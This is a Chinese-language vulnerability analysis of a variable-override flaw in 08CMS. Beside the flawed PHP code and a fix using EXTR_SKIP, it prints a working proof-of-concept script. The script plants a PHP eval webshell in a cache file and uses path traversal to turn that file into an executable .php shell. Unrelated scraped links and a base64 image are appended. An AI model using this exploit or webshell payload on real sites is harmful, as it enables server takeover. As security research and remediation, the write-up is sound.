08CMS Variable Override Write Arbitrarily WEBSHELL Into Arbitrarily Path
目录
. 漏洞描述
. 漏洞触发条件
. 漏洞影响范围
. 漏洞代码分析
. 防御方法
. 攻防思考
1. 漏洞描述
简单描述这个漏洞
. /include/general.inc.php
//本地变量注册
foreach(array('_POST','_GET') as $_request)
{
foreach($$_request as $k => $v)
{
$k{} != '_' && $$k = maddslashes($v);
}
}
/*
这里实现了模拟GPC功能,将用户输入的GET、POST数据中的变量注册到本地代码空间中,导致攻击者理论上可以向应用程序"注入"任意的变量值
*/ . 通过本地变量覆盖,黑客可以控制目标应用程序将要进行的写文件操作,向网站目录下的任意位置写入任意文件
2. 漏洞触发条件
0x1: 攻击流
. 上传一个包含WEBSHELL的非PHP文件
/*
/tools/ptool.php
..
$cf = M_ROOT.'./dynamic/stats/aclicks.cac';
$ct = M_ROOT.'./dynamic/stats/aclicks_time.cac';
..
if(@$fp = fopen($cf,'a'))
{
fwrite($fp,"$aid");
fclose($fp);
..
通过注入$aid,利用程序的本地变量覆盖漏洞,向/dynamic/stats/aclicks.cac写入WEBSHELL代码
$exp = /tools/ptool.php?aid=<?php eval($_POST[a]);?>
*/ . 在第二个变量覆盖攻击点,传入这个文件路径(将要被打开的文件路径):
$exp1 = /index.php?tplname=../../dynamic/stats/aclicks.cac . 程序打开/dynamic/stats/aclicks.cac,并重新写入到"/dynamic/stats/aclicks.cac.php"中,完成GETSHELL
0x2: POC
<?php
/*
exp: index.php?tplname=../../dynamic/stats/aclicks.cac
汽车CMS Shell: /dynamic/tplcache/common/....dynamicstatsaclicks.cac.php
装修CMS Shell /dynamic/dynamic/stats/aclicks.cac.php
*/
//$exp = /tools/ptool.php?aid=<?php eval($_POST[a]);?>
$exp = '/tools/ptool.php?aid=%3C%3Fphp%20eval%28%24_POST%5Ba%5D%29%3B%3F%3E';
//$exp1 = /index.php?tplname=../../dynamic/stats/aclicks.cac
$exp1 = '/index.php?tplname=..%2f..%2fdynamic%2fstats%2faclicks.cac'; if ($argc < )
{
print_r('
+---------------------------------------------------------------------------+
[+] php '.$argv[0].' [url]www.08sec.com[/url]
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(E_ERROR);
set_time_limit(); $host = $argv[];
go($host); function go ($host)
{
global $exp,$exp1; $re = Send ($host,$exp);
stripos($re, "MySQL") > ? Send ($host, $exp) : ""
$re = Send ($host, $exp1) && stripos($re, "aclicks.cac") > ? exit(" + Exploit Success!rn + http://$host/template/dynamic/stats/aclicks.cac.phprn") : exit(" - Exploit Failed!n");
} function Send($host,$url)
{
$data = "GET $url HTTP/1.1rn";
$data .= "Host: $hostrn";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [en]rn";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "Accept-Language: en-usrn";
$data .= "Connection: Closernrn";
$fp = @fsockopen($host, );
if (!$fp)
{
die("[-] Connect to host Errorrn");
}
fwrite($fp, $data);
$back = '';
while (!feof($fp))
{
$back .= fread($fp, );
}
fclose($fp);
return $back;
}
?>
Relevant Link:
http://www.unhonker.com/bug/1390.html
3. 漏洞影响范围
08CMS全部商业版
4. 漏洞代码分析
本地变量注册实现代码
/include/general.inc.php
aaarticlea/png;base64,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" alt="" />
/index.php
include_once dirname(__FILE__).'/include/general.inc.php';
include_once M_ROOT.'./include/common.fun.php'; if_siteclosed();
mobile_open() || message('手机版尚未开放');
/*
function un_virtual($str)
{
......
$str = str_replace(array('/','-'),array('&','='),$str); 把 / 和 - 替换成 & 和 =
......
return $str;
}
parse_str()把查询字符串解析到变量中,保存在变量$temparr中
*/
parse_str(un_virtual($_SERVER['QUERY_STRING']), $temparr);
... $_da = array();
if(!$cnstr)
{
//$tplname这个在这里定义的了,相当于被初始化了
$tplname = $_ismobile ? $o_index_tpl : $hometpl ;
$_da['rss'] = $cms_abs.'rss.php';
$_da += $temparr; // $_da= $_da+$temparr
unset($temparr);//销毁变量 //变量覆盖,这样我们可以控制了$tplname这个变量,即对它重新覆盖
extract($_da,EXTR_OVERWRITE);
//这个tpl_refresh函数就是漏洞利用的关键点
tpl_refresh($tplname);
...
/include/refresh.fun.php
function tpl_refresh($tplname)
{
global $templatedir,$debugtag;
$tdir = M_ROOT."template/$templatedir/"; //$tplname可以由攻击者控制,所以$cacf也等同于被攻击者控制
$cacf = $tdir.'pcache/'. $tplname.'.php';
if(file_exists($x = $tdir."function/utags.fun.php"))
{
include_once $x;
}
mmkdir($cacf,,);
if($debugtag || !file_exists($cacf))
{
//打开文件,返回内容
$str = load_tpl($tplname);
$tpl = @file2str(M_ROOT."template/$templatedir/".$tplname); //file2str这个是打开文件的函数
$rt && $tpl = preg_replace("/{tpl\$(.+?)}/ies", "rtagval('\1','$rt')",$tpl); 过滤 $str = preg_replace("/<\?(?!php\s|=|\s)/i", '<?='<?'?>', $str);
$str = preg_replace("/<!--{(.+?)}-->/s", "{\1}", $str);
breplace($str,'');
nreplace($str);
quit_refresh_var(); $str = tpl_basecode($str); /*
漏洞的关键,在这里
1. $str: 攻击者可控制,这是一个.cac文件的内容,攻击者可以通过另一个变量覆盖向服务器写入一个.cac的WEBSHELL
2. $cacf: 攻击者可控制,攻击者传入的参数是一个非PHP文件路径(.cac文件),这个文件也是真实存在的,可以通过另一个变量注入上传一个.cac文件,同时,程序在末尾拼接了".php",使其成为写一个PHP文件 从结果上来看,相当于进行了一次.cac到.php的后缀重命名处理
*/
str2file($str, $cacf);
}
unset($str,$tdir,$cacf);
}
5. 防御方法
/index.php
if(!$cnstr)
{
//$tplname这个在这里定义的了,相当于被初始化了
$tplname = $_ismobile ? $o_index_tpl : $hometpl ;
$_da['rss'] = $cms_abs.'rss.php';
$_da += $temparr; // $_da= $_da+$temparr
unset($temparr);//销毁变量 /*
如果对应变量已经存在,则不进行覆盖操作
*/
extract($_da, EXTR_SKIP);
tpl_refresh($tplname);
...
6. 攻防思考
防御变量覆盖的防御思路
. 重新运行一次原始的代码逻辑,将被覆盖的变量再赋值回原始的值
. 在本地变量注册的入口处对关键字进行检测
Copyright (c) 2014 LittleHann All rights reserved
08CMS Variable Override Write Arbitrarily WEBSHELL Into Arbitrarily Path的更多相关文章
- 【已解决】mac上appium报错:“Could not find aapt Please set the ANDROID_HOME environment variable with the Android SDK root directory path”
按照网上教程配置完appium环境后,真机跑自动化过程,遇到如下报错: appium报错如下: [ADB] Checking whether aapt is present [ADB] The AND ...
- Could not find aapt Please set the ANDROID_HOME environment variable with the Android SDK root directory path
写case写好好哒,突然debug的时候就冒出这个错误: selenium.common.exceptions.WebDriverException: Message: An unknown serv ...
- Appium问题解决方案(7)- Could not find 'adb.exe' in PATH. Please set the ANDROID_HOME environment variable with the Android SDK root directory path
背景:运行代码提示找不到ADB An unknown server-side error occurred while processing the command. Original error: ...
- Scala中的override
Scala中的override override是覆盖的意思,在很多语言中都有,在scala中,override是非常常见的,在类继承方面,它和java不一样,不是可写可不写的了,而是必须写的.如果不 ...
- 56.ERR! configure error gyp ERR! stack Error: Can't find Python executable "python", you can set the PYTHON env variable.
Node.js 在安装模块的时候报错,缺少python环境. ERR! configure error gyp ERR! stack Error: Can't find Python executab ...
- Android 中的mvvm
我们来了解一下MVVM模式与Databinding ,MVVM是一种模式,Databinding 是一种框架.DataBinding是一个实现数据和UI绑定的框架.而ViewModel和View可以通 ...
- 学习 java命令
依稀记得自己第一次编译*.java文件,第一次运行*.class文件.但是六七年过去了,现在运行java写的程序更多的是用tomcat这种web容器.最近有个小需求,写一个监控zookeeper集群的 ...
- 智能电视TV开发---客户端和服务器通信
在做智能电视应用的时候,最头疼的就是焦点问题,特别是对于个人开发者,没有设备这是最最头疼的事情了,在没有设备的情况下,怎么实现智能电视应用呢,接下来我是用TV程序来做演示的,所以接下来的所有操作是在有 ...
- Automake
Automake是用来根据Makefile.am生成Makefile.in的工具 标准Makefile目标 'make all' Build programs, libraries, document ...
随机推荐
- ubuntu13.04环境hadoop1.2.1单机模式安装
一.虚拟机上安裝ubuntun 13.04 中文版 当然,你要是习惯看英文版,也可以直接安装英文版.老老实实从官网下载安装即可,安装系统不是本文的重点.这里只提一个注意事项:新手安装前,切记断网,因为 ...
- 工作随笔——Java调用Groovy类的方法、传递参数和获取返回值
接触Groovy也快一年了,一直在尝试怎么将Groovy引用到日常工作中来.最近在做一个功能的时候,花了点时间重新看了下Java怎么调用Groovy的方法.传递参数和获取返回值. 示例Groovy代码 ...
- Apache POI 实现对 Excel 文件读写
1. Apache POI 简介 Apache POI是Apache软件基金会的开放源码函式库. 提供API给Java应用程序对Microsoft Office格式档案读和写的功能. 老外起名字总是很 ...
- c#新语法学习笔记
1.匿名类 匿名类编译之后会生成一个具体的泛型类,匿名类的属性是只读的.在临时数据传递时非常方便(linq查询).匿名类中不能有方法.数据传输(json),数据查询(linq) }; 2.匿名方法匿名 ...
- 如何用 fiddler 调试线上代码
有时代码上线了,突然就碰到了坑爹的错误.或者有时看别人家线上的代码,对于一个文件想 fork 下来试试效果又不想把全部文件拉到本地,都可以使用 fiddler 的线上调试功能. 比方说我们打开携程的首 ...
- pay-as-you-go
What is pay as you go? A pay as you go deal means you aren’t tied into a contract and can top up you ...
- JAVA内嵌数据库H2的使用入门
H2数据库是开源的,非常适合做嵌入式数据库使用,尤其用java编码的时候. H2的优势: 1.h2采用纯Java编写,因此不受平台的限制. 2.h2只有一个jar文件,十分适合作为嵌入式数据库试用. ...
- 为什么要加入<!doctype html>这个文档声明——IE怪异模式
调试了很久,发现了一个非常细微但又十分重要的问题,又一次我在对于文档声明类型的时候,声明了如下类型 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1 ...
- 有趣的问题--12 coins problem
问题描述: 12个金币,其中有一枚是假的,重量与众不同. 现有一架天平,需要你用最少的次数来称重,然后告诉我: (1)哪个金币是假的 (2)它到底是更轻还是更重. (注:此处为3次) {解 ...
- MVC 中的 ispostback
总之呢就是在MVC中试下 ispostback那种效果, 环境就是:登录验证loinger, if (Request.HttpMethod == "POST"){} 没理解透彻 源 ...